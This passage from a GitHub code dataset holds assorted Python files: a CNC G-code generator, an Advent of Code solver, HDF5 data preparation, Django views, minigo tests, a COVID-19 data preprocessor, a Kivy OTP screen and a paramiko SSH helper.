pixels per mm)\r\n moveextents=True, # Move head over extents and require confirmation before start\r\n hopheight=2, # Height of the head above the drilling depth while traversing (mm)\r\n tspeedxy=100, # Traversal speed in X-Y (mm/s)\r\n dspeedxy=1.5, # Drill speed in X-Y (mm/s)\r\n tspeedz=5, # Traversal (retraction) speed in Z (mm/s)\r\n dspeedz=0.6, # Sink speed in Z (mm/s)\r\n negativey=True, # Whether to invert Y axis (required on Marlin e.g.)\r\n diag=False, # Diagnostics mode to export tracks to SVG (requires SVGGEN)\r\n):\r\n '''Main one converting image to a GCode file'''\r\n\r\n # Get vector \"list of lists\"\r\n vectors = vectorizer.vectorize(\r\n inputfile,\r\n method='f',\r\n invertpixels=invertpixels,\r\n splittogrid=(500, 500),\r\n calibrator=None,\r\n reverseall=True,\r\n negativey=negativey,\r\n )\r\n # Export SVG if in diagnostics mode\r\n if diag:\r\n try:\r\n import svggen\r\n svggen.svggen(vectors, inputfile + '.svg')\r\n except BaseException:\r\n print('No SVGGEN library available')\r\n # Calculate scaling and extents\r\n allx, ally = set(), 
set() # Collectors\r\n for sid, shape in enumerate(vectors):\r\n for pid, point in enumerate(shape):\r\n # Point-per-point\r\n nx, ny = round(point[0] * scale, 3), round(point[1] * scale, 3)\r\n vectors[sid][pid] = (nx, ny)\r\n # Collectors for extent calculations\r\n allx.add(nx)\r\n ally.add(ny)\r\n extents = min(allx), min(ally), max(allx), max(ally)\r\n\r\n # Normalize speeds to GCode/GRBL unit: mm/min (from mm/s)\r\n tspeedxy = round(tspeedxy * 60)\r\n dspeedxy = round(dspeedxy * 60)\r\n tspeedz = round(tspeedz * 60)\r\n dspeedz = round(dspeedz * 60)\r\n\r\n # Show to the user\r\n print('Extents (x1,y1,x2,y2) mm:', extents)\r\n print('Size (x,y) mm:', extents[2] - extents[0], extents[3] - extents[1])\r\n\r\n gcode = [] # Collector of instructions to be assembled later\r\n # Perform initial hop to height's initial position\r\n gcode.append('G0 F{0} Z{1}'.format(tspeedz, hopheight))\r\n # Show extents if required\r\n if moveextents:\r\n gcode.append('G0 X{0} Y{1} F{2};Top left'.format(extents[0], extents[3], tspeedxy))\r\n gcode.append('M0 Confirm Top Left;Wait for confirmation')\r\n gcode.append('G0 X{0} Y{1} F{2};Bottom right'.format(extents[2], extents[1], tspeedxy))\r\n gcode.append('M0 Confirm Bot Right;Wait for confirmation')\r\n # Head is now in position.\r\n # Process vectors step-by-step, considering head hops and relative speeds. Note that\r\n # the GCode controller, by the point of the first instructions, has already been\r\n # switched to absolute motor positioning mode, which corresponds to the coordinate system\r\n # of the vectors.\r\n gcode.append('M117 Drilling...')\r\n for shape in vectors:\r\n # Assume head is up, move above the entry point\r\n gcode.append('G0 X{0} Y{1} F{2}'.format(shape[0][0], shape[0][1], tspeedxy))\r\n gcode.append('G0 Z0 F{0}'.format(dspeedz))\r\n for point in shape[1:]:\r\n # Step to point\r\n gcode.append('G0 X{0} Y{1} F{2}'.format(point[0], point[1], dspeedxy))\r\n # Retract drill to hop height at the end of shape\r\n gcode.append('G0 F{0} Z{1}'.format(tspeedz, hopheight))\r\n # After all shapes, return to the origin point\r\n gcode.append('G0 X0 Y0 F{0}'.format(tspeedxy))\r\n gcode.append('G0 Z0 F{0}'.format(dspeedz))\r\n\r\n # Completed the code itself. 
Append headers and footers\r\n    gcode = GCodeHeader + gcode + GCodeFooter\r\n\r\n    # Assemble into a file\r\n    if not outputfile:\r\n        outputfile = inputfile + '.gcode'\r\n    outf = open(outputfile, 'w', encoding='utf-8')  # 'ANSI' is not a valid Python codec\r\n    outf.write('\\n'.join(gcode))\r\n    outf.close()\r\n    print('All done, instructions written:', len(gcode))\r\n\r\n\r\n### Ran as main?\r\n################\r\nif __name__ == '__main__':\r\n    img2cnc('inputs\\\\pcbsample.png')\r\n    # img2cnc('inputs\\\\24x24.png')\r\n    # img2cnc('inputs\\\\sampleprint.png')\r\n    img2cnc('inputs\\\\funkcionira.png')","repo_name":"otonribic/3dp2cnc","sub_path":"3dp2cnc.py","file_name":"3dp2cnc.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"23610223500","text":"import heapq\n\ndata = []\nwith open('input.txt', 'r') as f:\n    line = f.readline().strip()\n    rowlen = len(line)\n    ninerow = [9 for _ in range(rowlen+2)]\n    data.append(ninerow)\n    while line:\n        row = [9]\n        for c in line.strip():\n            row.append(int(c))\n        row.append(9)\n        data.append(row)\n        line = f.readline().strip()\n    data.append(ninerow)\n\nlowpoints = []\nfor y in range(1, len(data)-1):\n    for x in range(1, len(data[0])-1):\n        if (data[y][x] < data[y-1][x] and\n            data[y][x] < data[y+1][x] and\n            data[y][x] < data[y][x-1] and\n            data[y][x] < data[y][x+1]):\n            lowpoints.append((y, x))\n\ndef neighbours(x, y):\n    return [(x-1, y), (x+1, y), (x, y-1), (x, y+1)]\n\nheap = [0, 0, 0]\n\n# visited is indexed as visited[y][x]: len(data) rows of len(data[0]) columns\nvisited = [[False for _ in range(len(data[0]))] for _ in range(len(data))]\nfor (y, x) in lowpoints:\n    basin_size = 0\n    to_visit = [(y, x)]\n    visited[y][x] = True\n    while to_visit:\n        k,j = to_visit.pop()\n        basin_size += 1\n        for (b, a) in neighbours(k, j):\n            if visited[b][a] or data[b][a] == 9:\n                continue\n            to_visit.append((b, a))\n            visited[b][a] = True\n    heapq.heappushpop(heap, basin_size)\nprint(heap[0] * heap[1] * heap[2])\n","repo_name":"chriskamphuis/aoc2021","sub_path":"09/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"73298937527","text":"import h5py\nimport numpy as np\nimport re\nimport glob\nimport vtk\ndef natural_sort(l):\n    convert = lambda text: int(text) if text.isdigit() else text.lower()  # isdigit() is True only for all-digit strings; lower() lowercases the rest\n    alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n    return sorted(l, key = alphanum_key)\npoint_path = natural_sort(glob.glob('*/sub_tract.npy'))\n\nregion = np.load('swm_100_ad_atlas_8cluster.npy')\n\nfor i in range(len(point_path)):\n    point = np.load(point_path[i])\n    id = point_path[i].split('/')[-2]\n    ind_region = np.load('{}_105regions.npy'.format(id))[:,0,:]\n    print(ind_region.shape) #(10000,105)\n    path2 = 'downsam_point_label_region_sort_{}.h5'.format(id)\n    h5f = h5py.File(path2, 'w')\n    h5f.create_dataset('point', data=point)\n    h5f.create_dataset('region',data=region)\n    h5f.create_dataset('ind_region',data=ind_region)\n\nh5_path = natural_sort(glob.glob('downsam_point_label_region_sort_*.h5'))\npoints_20 = None\nlabels_20 = None\nregions_20 = None\nind_regions_20 = None\nj_range = list(range(0,125,25))\nfor j in range(len(j_range)):\n    for i in range(25):\n        h5_ = h5py.File(h5_path[j_range[j] + i],'r')  # i-th file of the j-th chunk of 25\n        points = np.array(h5_['point'])\n        regions = np.array(h5_['region'])\n        ind_regions = np.array(h5_['ind_region'])\n        if i == 0:\n            points_20 = points\n            regions_20 = regions\n            ind_regions_20 = 
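# The basin snippet above keeps the three largest sizes in a fixed-size
# min-heap: heappushpop() pushes the new value and pops the smallest, so the
# heap always holds the k largest values seen. A generic sketch of that trick:
import heapq

def k_largest(values, k=3):
    heap = [float('-inf')] * k  # any seed smaller than real values works
    for v in values:
        heapq.heappushpop(heap, v)
    return sorted(heap)

print(k_largest([9, 14, 3, 35, 57, 9, 5]))  # [14, 35, 57]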
ind_regions\n        else:\n            points_20 = np.concatenate((points_20,points),axis=0)\n            regions_20 = np.concatenate((regions_20,regions),axis=0)\n            ind_regions_20 = np.concatenate((ind_regions_20,ind_regions),axis=0)\n    path2 = 'sf_clusters_train_featMatrix_{}.h5'.format(j+1)\n    h5f = h5py.File(path2, 'w')\n    h5f.create_dataset('point', data=points_20)\n    h5f.create_dataset('region',data=regions_20)\n    h5f.create_dataset('ind_region',data=ind_regions_20)\n\n    \n","repo_name":"gaunny/Anat-SFSeg","sub_path":"data/AD_MCI_S01/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"29263898762","text":"import json\nimport re\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom sign.forms import *\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import CreateView\nfrom django.urls import reverse_lazy\nfrom sign.models import Order, RecordTetris, Users\nfrom django.core.mail import send_mail\n\n\n# Create your views here.\ndef index(request):\n    if request.user.is_authenticated:\n        link = 'profile'\n    else:\n        link = 'login'\n    return render(request, 'sign/index.html', {'title': 'Главная страница', 'link': link})\n\n@login_required\ndef logout_view(request):\n    \"\"\" Logout page \"\"\"\n    logout(request)\n\n    return redirect('index')\n    \nclass register_view(CreateView):\n    \"\"\" Registration page \"\"\"\n    form_class = UserRegistrationForm\n    template_name = 'sign/register.html'\n    success_url = reverse_lazy('login')\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title']='Регистрация'\n        return dict(list(context.items()))\n\n@login_required\ndef profile_view(request):\n    \"\"\" Profile page \"\"\"\n    try:\n        user = Users.objects.get(user_id=request.user.id)\n        return render(request, 'sign/profile.html', {'title': 'Профиль', 'name': user.name, 'surname': user.surname, 'phone': user.phone, 'isAddContact': True})\n    except:\n        return render(request, 'sign/profile.html', {'title': 'Профиль', 'isAddContact': False})\n    \n\n@login_required\ndef save_data(request):\n    data = json.loads(request.body)\n    usr_phone = ''\n    usr_phone = (int)((usr_phone.join(re.findall(r'\\d*', data['2'])))[1:])\n    try:\n        Users.objects.get(user_id=request.user.id)\n    except:\n        Users.objects.create(name=data['0'], surname=data['1'], phone=usr_phone, user_id=request.user.id)\n    else:\n        Users.objects.filter(user_id=request.user.id).update(name=data['0'], surname=data['1'], phone=usr_phone)\n    return JsonResponse({})\n\n@login_required\ndef save_order(request):\n    data = json.loads(request.body)\n    user = Users.objects.get(user_id=request.user.id)\n    Order.objects.create(user_id_id=user.id, theme=data['0'], content=data['1'])\n    send_mail(\n        'Заказ: '+data['0'],\n        'Содержание: ' + data['1'] + '\\nПользователь: {} {}\\nТелефон: +7{}'.format(user.name, user.surname, user.phone),\n        'aigames@list.ru',\n        ['aigames@list.ru'],\n        fail_silently=False,\n    )\n    return JsonResponse({})\n\n@login_required\ndef save_rec(request):\n    data = json.loads(request.body)\n    try:\n        RecordTetris.objects.get(user_id=request.user.id)\n    except:\n        RecordTetris.objects.create(record=data, user_id=request.user.id)\n    else:\n        RecordTetris.objects.filter(user_id=request.user.id).update(record=data)\n    return JsonResponse({})\n\n@login_required\ndef secret_view(request):\n    \"\"\" Page 
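# A minimal h5py round-trip in the same style as above, but using context
# managers so the files are closed deterministically (the snippet above leaves
# its handles open). The filename and dataset names here are hypothetical.
import h5py
import numpy as np

with h5py.File('example.h5', 'w') as f:
    f.create_dataset('point', data=np.zeros((10, 3)))

with h5py.File('example.h5', 'r') as f:
    point = np.array(f['point'])  # copy the data out while the file is open
print(point.shape)  # (10, 3)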
accessible only to authorized users \"\"\"\n\n    return render(request, 'sign/profile.html', {'title': 'Профиль'})","repo_name":"MrLobotomist/project2","sub_path":"sign/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"35566404633","text":"import numpy as np\n\nimport features\nimport go\nfrom tests import test_utils\n\nEMPTY_ROW = '.' * go.N + '\\n'\nTEST_BOARD = test_utils.load_board('''\n.X.....OO\nX........\nXXXXXXXXX\nOX......O\n''' + EMPTY_ROW * 5)\n\nTEST_POSITION = go.Position(\n    board=TEST_BOARD,\n    n=3,\n    komi=6.5,\n    caps=(1, 2),\n    ko=None,\n    recent=(go.PlayerMove(go.BLACK, (0, 1)),\n            go.PlayerMove(go.WHITE, (0, 8)),\n            go.PlayerMove(go.BLACK, (1, 0))),\n    to_play=go.BLACK,\n)\n\nTEST_BOARD2 = test_utils.load_board('''\n.XOXXOO..\nXO.OXOX..\nXXO..X...\n''' + EMPTY_ROW * 6)\n\nTEST_POSITION2 = go.Position(\n    board=TEST_BOARD2,\n    n=0,\n    komi=6.5,\n    caps=(0, 0),\n    ko=None,\n    recent=tuple(),\n    to_play=go.BLACK,\n)\n\n\nTEST_POSITION3 = go.Position()\nfor coord in ((0, 0), (0, 1), (0, 2), (0, 3), (1, 1)):\n    TEST_POSITION3.play_move(coord, mutate=True)\n# resulting position should look like this:\n# X.XO.....\n# .X.......\n# .........\n\n\nclass TestFeatureExtraction(test_utils.MinigoUnitTest):\n    def test_stone_features(self):\n        f = features.stone_features(TEST_POSITION3)\n        self.assertEqual(go.WHITE, TEST_POSITION3.to_play)\n        self.assertEqual((9, 9, 16), f.shape)\n        self.assertEqualNPArray(f[:, :, 0], test_utils.load_board('''\n            ...X.....\n            .........''' + EMPTY_ROW * 7))\n\n        self.assertEqualNPArray(f[:, :, 1], test_utils.load_board('''\n            X.X......\n            .X.......''' + EMPTY_ROW * 7))\n\n        self.assertEqualNPArray(f[:, :, 2], test_utils.load_board('''\n            .X.X.....\n            .........''' + EMPTY_ROW * 7))\n\n        self.assertEqualNPArray(f[:, :, 3], test_utils.load_board('''\n            X.X......\n            .........''' + EMPTY_ROW * 7))\n\n        self.assertEqualNPArray(f[:, :, 4], test_utils.load_board('''\n            .X.......\n            .........''' + EMPTY_ROW * 7))\n\n        self.assertEqualNPArray(f[:, :, 5], test_utils.load_board('''\n            X.X......\n            .........''' + EMPTY_ROW * 7))\n\n        all_zeros = np.zeros([go.N, go.N])\n        for i in range(10, 16):\n            self.assertEqualNPArray(all_zeros, f[:, :, i])\n\n    def test_stone_color_feature(self):\n        f = features.stone_color_feature(TEST_POSITION)\n        self.assertEqual((9, 9, 3), f.shape)\n        # plane 0 is B\n        self.assertEqual(1, f[0, 1, 0])\n        self.assertEqual(0, f[0, 1, 1])\n        # plane 1 is W\n        self.assertEqual(0, f[0, 8, 0])\n        self.assertEqual(1, f[0, 8, 1])\n        # plane 2 is empty\n        self.assertEqual(1, f[0, 5, 2])\n        self.assertEqual(0, f[0, 5, 1])\n\n    def test_liberty_feature(self):\n        f = features.liberty_feature(TEST_POSITION)\n        self.assertEqual(f.shape, (9, 9, features.liberty_feature.planes))\n\n        self.assertEqual(0, f[0, 0, 0])\n        # the stone at 0, 1 has 3 liberties.\n        self.assertEqual(1, f[0, 1, 2])\n        self.assertEqual(0, f[0, 1, 4])\n        # the group at 0, 7 has 3 liberties\n        self.assertEqual(1, f[0, 7, 2])\n        self.assertEqual(1, f[0, 8, 2])\n        # the group at 1, 0 has 18 liberties\n        self.assertEqual(1, f[1, 0, 7])\n\n    def test_few_liberties_feature(self):\n        f = features.few_liberties_feature(TEST_POSITION)\n        self.assertEqual(\n            f.shape, (9, 9, features.few_liberties_feature.planes))\n\n        self.assertEqualNPArray([0, 0, 0], f[0, 0])\n        # the stone at 0, 1 has 3 liberties.\n        self.assertEqualNPArray([0, 0, 1], f[0, 1])\n        # the group at 0, 7 has 3 liberties.\n        self.assertEqualNPArray([0, 0, 1], f[0, 
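# The stone-color feature tested above is a per-point one-hot encoding of the
# board; a small NumPy sketch (the encoding 1=black, -1=white, 0=empty is an
# assumption for illustration, not necessarily minigo's internal layout):
import numpy as np

def stone_color_planes(board):
    planes = np.zeros(board.shape + (3,), dtype=np.uint8)
    planes[..., 0] = board == 1   # plane 0: black stones
    planes[..., 1] = board == -1  # plane 1: white stones
    planes[..., 2] = board == 0   # plane 2: empty points
    return planes

board = np.array([[1, 0], [-1, 1]])
print(stone_color_planes(board)[:, :, 0])  # the black-stone plane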
7])\n        self.assertEqualNPArray([0, 0, 1], f[0, 8])\n        # the group at 1, 0 has 18 liberties but few_liberties_feature only has\n        # non-zero entries for groups with {1, 2, 3} liberties.\n        self.assertEqualNPArray([0, 0, 0], f[1, 0])\n        # the group at 3, 0 has 1 liberty.\n        self.assertEqualNPArray([1, 0, 0], f[3, 0])\n        # the group at 3, 8 has 2 liberties.\n        self.assertEqualNPArray([0, 1, 0], f[3, 8])\n\n    def test_recent_moves_feature(self):\n        f = features.recent_move_feature(TEST_POSITION)\n        self.assertEqual(f.shape, (9, 9, features.recent_move_feature.planes))\n        # most recent move at (1, 0)\n        self.assertEqual(1, f[1, 0, 0])\n        self.assertEqual(0, f[1, 0, 3])\n        # second most recent move at (0, 8)\n        self.assertEqual(1, f[0, 8, 1])\n        self.assertEqual(0, f[0, 8, 0])\n        # third most recent move at (0, 1)\n        self.assertEqual(1, f[0, 1, 2])\n        # no more older moves\n        self.assertEqualNPArray(np.zeros([9, 9]), f[:, :, 3])\n        self.assertEqualNPArray(\n            np.zeros([9, 9]), f[:, :, features.recent_move_feature.planes - 1])\n\n    def test_would_capture_feature(self):\n        f = features.would_capture_feature(TEST_POSITION2)\n        self.assertEqual(\n            (9, 9, features.would_capture_feature.planes), f.shape)\n        # move at (1, 2) would capture 2 stones\n        self.assertEqualNPArray([1], f[1, 2])\n        # move at (0, 0) should not capture stones because it's B's move.\n        self.assertEqualNPArray([0], f[0, 0])\n        # move at (0, 7) would capture 3 stones\n        self.assertEqualNPArray([1], f[0, 7])\n","repo_name":"tensorflow/minigo","sub_path":"tests/test_features.py","file_name":"test_features.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","stars":3409,"dataset":"github-code","pt":"77"}
{"seq_id":"29468906359","text":"def buscarTodas(a, b):\r\n    # Collect the position of every occurrence of character b in a\r\n    indices = [str(pos) for pos, letra in enumerate(a) if letra == b]\r\n    return \" \".join(indices)\r\nprint(buscarTodas(\"tres tristes tigres\",\"t\"))","repo_name":"pabloschwarzenberg/grader","sub_path":"tema8_ej2/tema8_ej2_93161a680455ac82ba5c8aa8ca35a71f.py","file_name":"tema8_ej2_93161a680455ac82ba5c8aa8ca35a71f.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"41710800452","text":"# Lint as: python3\n\"\"\"\nThis script preprocesses the covid19 data from the Italy Department of Civil\nProtection for importing into Data Commons.\n\"\"\"\n\nimport pandas as pd\n\n\nclass PcmDpc:\n    \"\"\"Download the csv files and preprocess them for importing into\n    DataCommons.\"\"\"\n\n    def preprocess(self):\n        \"\"\"Clean and save the CSV file.\"\"\"\n        self.data = pd.read_csv(self.csvpath)\n        assert 'note' in self.data.columns\n        self.data = self.data.drop(columns=['note'])\n        self._translate()\n        # Drop the time, keep the date only.\n        self.data['Date'] = self.data['Date'].str[0:10]\n        self.set_location()  # Preprocess the geo ids.\n        self.data.to_csv(self.name + '.csv', index=False)\n\n    def generate_tmcf(self):\n        \"\"\"Generate the template mcf.\"\"\"\n        geo_node = self.geo_template()  # Write the geo node to template mcf.\n        TEMPLATE = ('Node: E:pcm-dpc->E{index}\\n'\n                    'typeOf: dcs:StatVarObservation\\n'\n                    'variableMeasured: dcs:{SVname}\\n'\n                    'observationAbout: {geoNode}\\n'\n                    'observationDate: C:pcm-dpc->Date\\n'\n                    'value: C:pcm-dpc->{SVname}\\n\\n')\n        idx = 1\n        with open(self.name + '.tmcf', 'a') as f_out:\n            for statvar in self.stat_vars:\n                f_out.write(\n                    
TEMPLATE.format_map({\n 'index': idx,\n 'SVname': statvar,\n 'geoNode': geo_node\n }))\n idx += 1\n\n def _translate(self):\n \"\"\"Translate coloumn names from italian to english.\"\"\"\n it2en = {\n 'data': 'Date',\n 'stato': 'State',\n 'codice_regione': 'RegionCode',\n 'denominazione_regione': 'RegionName',\n 'codice_provincia': 'ProvinceCode',\n 'denominazione_provincia': 'ProvinceName',\n 'sigla_provincia': 'ProvinceAbbreviation',\n 'lat': 'Latitude',\n 'long': 'Longitude',\n 'ricoverati_con_sintomi':\n ('Count_MedicalConditionIncident'\n '_COVID_19_PatientHospitalizedWithSymptoms'),\n 'terapia_intensiva': ('Count_MedicalConditionIncident'\n '_COVID_19_PatientInICU'),\n 'totale_ospedalizzati': ('Count_MedicalConditionIncident'\n '_COVID_19_PatientHospitalized'),\n 'isolamento_domiciliare': ('Count_MedicalConditionIncident'\n '_COVID_19_PatientInHomeIsolation'),\n 'totale_positivi': ('Count_MedicalConditionIncident'\n '_COVID_19_ActiveCase'),\n 'variazione_totale_positivi':\n ('IncrementalCount_Medical'\n 'ConditionIncident_COVID_19_PositiveCase'),\n 'nuovi_positivi': ('IncrementalCount_MedicalConditionIncident'\n '_COVID_19_ActiveCase'),\n 'dimessi_guariti': ('CumulativeCount_MedicalConditionIncident'\n '_COVID_19_PatientRecovered'),\n 'deceduti': ('CumulativeCount_MedicalConditionIncident_COVID_19'\n '_PatientDeceased'),\n 'totale_casi': ('CumulativeCount_MedicalConditionIncident_'\n 'COVID_19_PositiveCase'),\n 'tamponi': 'CumulativeCount_MedicalTest_COVID_19',\n 'casi_testati': 'CumulativeCount_Person_COVID_19_Tested',\n 'casi_da_sospetto_diagnostico': 'PositiveCasesFromClinicActivity',\n 'casi_da_screening': 'PositiveCasesFromSurveyAndTest'\n }\n for col in self.data.columns:\n assert col in it2en\n self.data = self.data.rename(columns=it2en)\n\n def set_location(self):\n raise NotImplementedError\n\n def geo_template(self):\n raise NotImplementedError\n\n\n_STAT_VARS = [('Count_MedicalConditionIncident_COVID_19_'\n 'PatientHospitalizedWithSymptoms'),\n 'Count_MedicalConditionIncident_COVID_19_PatientInICU',\n ('Count_MedicalConditionIncident_COVID_19_'\n 'PatientHospitalized'),\n ('Count_MedicalConditionIncident_COVID_19_'\n 'PatientInHomeIsolation'),\n 'Count_MedicalConditionIncident_COVID_19_ActiveCase',\n ('IncrementalCount_MedicalConditionIncident_COVID_19_'\n 'PositiveCase'),\n ('IncrementalCount_MedicalConditionIncident_COVID_19_'\n 'ActiveCase'),\n ('CumulativeCount_MedicalConditionIncident_COVID_19_'\n 'PatientRecovered'),\n ('CumulativeCount_MedicalConditionIncident_COVID_19'\n '_PatientDeceased'),\n ('CumulativeCount_MedicalConditionIncident_'\n 'COVID_19_PositiveCase'), 'CumulativeCount_MedicalTest_COVID_19',\n 'CumulativeCount_Person_COVID_19_Tested']\n\n\nclass PcmDpcNational(PcmDpc):\n \"\"\"Subclass processing national data.\"\"\"\n\n def __init__(self):\n self.csvpath = ('https://raw.githubusercontent.com/pcm-dpc/COVID-19/'\n 'master/dati-andamento-nazionale/dpc-covid19-ita-and'\n 'amento-nazionale.csv')\n self.name = \"dpc-covid19-ita-national-trend\"\n self.stat_vars = _STAT_VARS\n\n def set_location(self):\n assert (self.data['State'] == 'ITA').all()\n self.data = self.data.drop(columns=['State'])\n\n def geo_template(self):\n return 'dcid:country/ITA'\n\n\nclass PcmDpcRegions(PcmDpc):\n \"\"\"Subclass processing regional data.\"\"\"\n\n def __init__(self):\n self.csvpath = ('https://raw.githubusercontent.com/pcm-dpc/COVID-19/'\n 'master/dati-regioni/dpc-covid19-ita-regioni.csv')\n self.name = \"dpc-covid19-ita-regional\"\n self.stat_vars = _STAT_VARS\n\n def 
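# str.format_map(), used by generate_tmcf() above, fills named placeholders
# directly from a mapping without keyword unpacking. A tiny standalone demo
# with a shortened template and hypothetical values:
TEMPLATE = ('Node: E:pcm-dpc->E{index}\n'
            'variableMeasured: dcs:{SVname}\n')
print(TEMPLATE.format_map({'index': 1,
                           'SVname': 'CumulativeCount_MedicalTest_COVID_19'}))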
set_location(self):\n region_code_path = 'ISTAT_code/ISTAT_region.csv'\n region_code = pd.read_csv(region_code_path)[['Region Code', 'NUTS2']]\n code_dict = region_code.set_index('Region Code').to_dict()['NUTS2']\n # Region code 21 and 22 is missing from the dict above; add manually here.\n code_dict[21] = 'nuts/ITH1'\n code_dict[22] = 'nuts/ITH2'\n self.data['Location'] = self.data['RegionCode'].map(code_dict)\n self.data = self.data.drop(columns=[\n 'State', 'RegionCode', 'RegionName', 'Latitude', 'Longitude'\n ])\n\n def geo_template(self):\n GEO_TEMPLATE = ('Node: E:pcm-dpc->E0\\n'\n 'typeOf: dcs:EurostatNUTS2\\n'\n 'dcid: C:pcm-dpc->Location\\n\\n')\n with open(self.name + '.tmcf', 'w') as f_out:\n f_out.write(GEO_TEMPLATE)\n return 'E:pcm-dpc->E0'\n\n\nclass PcmDpcProvinces(PcmDpc):\n \"\"\"Subclass of provinces data.\"\"\"\n\n def __init__(self):\n self.csvpath = ('https://raw.githubusercontent.com/pcm-dpc/COVID-19/'\n 'master/dati-province/dpc-covid19-ita-province.csv')\n self.name = \"dpc-covid19-ita-province\"\n self.stat_vars = [\n 'CumulativeCount_MedicalConditionIncident_'\n 'COVID_19_PositiveCase'\n ]\n\n def set_location(self):\n province_code_path = 'ISTAT_code/ISTAT_province.csv'\n province_code = pd.read_csv(province_code_path)[[\n 'Province Abbreviation', 'NUTS3'\n ]]\n province_dict = (\n province_code.set_index('Province Abbreviation').to_dict()['NUTS3'])\n # Drop the data whose location is \"being defined/updated\",\n # i.e. ProvinceCode > 111.\n # Location Sud Sardegna (Province Code = 111) is not defined as a\n # unique area in DataCommons, skip for now.\n self.data = self.data[self.data['ProvinceCode'] < 111].reset_index()\n self.data['Location'] = self.data['ProvinceAbbreviation'].map(\n province_dict)\n self.data = self.data[[\n 'Date', 'Location', 'CumulativeCount_Medical'\n 'ConditionIncident_COVID_19_PositiveCase'\n ]]\n\n def geo_template(self):\n GEO_TEMPLATE = ('Node: E:pcm-dpc->E0\\n'\n 'typeOf: dcs:EurostatNUTS3\\n'\n 'dcid: C:pcm-dpc->Location\\n\\n')\n with open(self.name + '.tmcf', 'w') as f_out:\n f_out.write(GEO_TEMPLATE)\n return 'E:pcm-dpc->E0'\n\n\ndef main():\n \"\"\"Process the national, regional, provinces data and generate\n corresponding template mcfs.\"\"\"\n for data in [PcmDpcNational(), PcmDpcRegions(), PcmDpcProvinces()]:\n data.preprocess()\n data.generate_tmcf()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"datacommonsorg/data","sub_path":"scripts/pcm-dpc/covid-19/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":8698,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"77"} +{"seq_id":"13100756648","text":"from kivy.uix.screenmanager import Screen\nfrom kivy.network.urlrequest import UrlRequest\nimport json\nfrom kivymd.uix.dialog import MDDialog\nfrom kivymd.uix.button import MDRaisedButton\nfrom Integrated_Api_Function.url import Base_Url\n\nclass OTPScreen(Screen):\n\n def __init__(self, **kwargs):\n super(OTPScreen, self).__init__(**kwargs)\n self.url ='{}/email_otp/'.format(Base_Url)\n self.request = None \n \n def send_otp_request(self):\n otp = self.ids.otp_field.text\n \n payload = {\n 'otp': otp,\n }\n self.request = UrlRequest(\n self.url,\n on_success=self.on_otp_success,\n on_failure=self.on_otp_failure,\n req_body=json.dumps(payload),\n req_headers={'Content-type': 'application/json'}\n )\n\n def on_otp_success(self, request, result):\n print(\"result success------>\",result)\n dialog = MDDialog(\n title=\"Success\",\n 
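# set_location() above resolves region codes through Series.map(dict); codes
# missing from the mapping come back as NaN, which is why 21 and 22 are
# patched in by hand. A compact sketch with made-up codes:
import pandas as pd

code_dict = {1: 'nuts/ITC1', 2: 'nuts/ITC2'}
df = pd.DataFrame({'RegionCode': [1, 2, 21]})
df['Location'] = df['RegionCode'].map(code_dict)
print(df)  # code 21 maps to NaN until it is added to code_dict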
text=result['message'],\n buttons=[\n MDRaisedButton(\n text=\"OK\",\n on_release=self.dismiss_success_dialog\n )\n ]\n )\n dialog.open()\n \n def dismiss_success_dialog(self, *args):\n self.manager.current = 'reset_password'\n\n def on_otp_failure(self, request, result):\n print(\"resultfailure------>\",result)\n dialog = MDDialog(\n title=\"Error\",\n text=result['message'],\n buttons=[\n MDRaisedButton(\n text=\"OK\",\n on_release=self.dismiss_failure_dialog\n )\n ]\n )\n dialog.open()\n \n def dismiss_failure_dialog(self, *args):\n self.manager.current = 'OTP_Screen'","repo_name":"webdeveloper510/Kivy_Fridge_App_Frontend","sub_path":"Integrated_Api_Function/validateotp.py","file_name":"validateotp.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3223434418","text":"import logging\nimport os\n\nimport paramiko\nfrom configs import config\n\nport = 22\nparamiko.util.log_to_file(config.sshLogPath)\n\n\nclass SSH:\n def __init__(self):\n self.ssh_conns = {}\n self.command = ''\n\n def register_command(self, command):\n self.command = command\n\n def setup_connection_to_host(self, hostname):\n if hostname in self.ssh_conns:\n return None\n\n logger = paramiko.util.logging.getLogger()\n logging.getLogger(\"paramiko\").setLevel(logging.WARNING)\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.WarningPolicy())\n\n # ssh_config = paramiko.SSHConfig()\n # user_config_file = os.path.expanduser(\"~/.ssh/config\")\n # with io.open(user_config_file, 'rt', encoding='utf-8') as f:\n # ssh_config.parse(f)\n # host_conf = ssh_config.lookup(hostname)\n # if host_conf:\n # if 'proxycommand' in host_conf:\n # cfg['sock'] = paramiko.ProxyCommand(host_conf['proxycommand'])\n\n key = paramiko.RSAKey.from_private_key_file(config.sshKeyPath, password=os.getenv(\"SSH_PASSWORD\"))\n logging.info(f'connecting to {hostname}')\n client.connect(hostname=hostname, username=os.getenv(\"SSH_USER\"), pkey=key, password=os.getenv(\"SSH_PASSWORD\"))\n logging.info(f'connected to {hostname}')\n\n self.ssh_conns[hostname] = client\n\n def setup_connections_to_hosts(self, 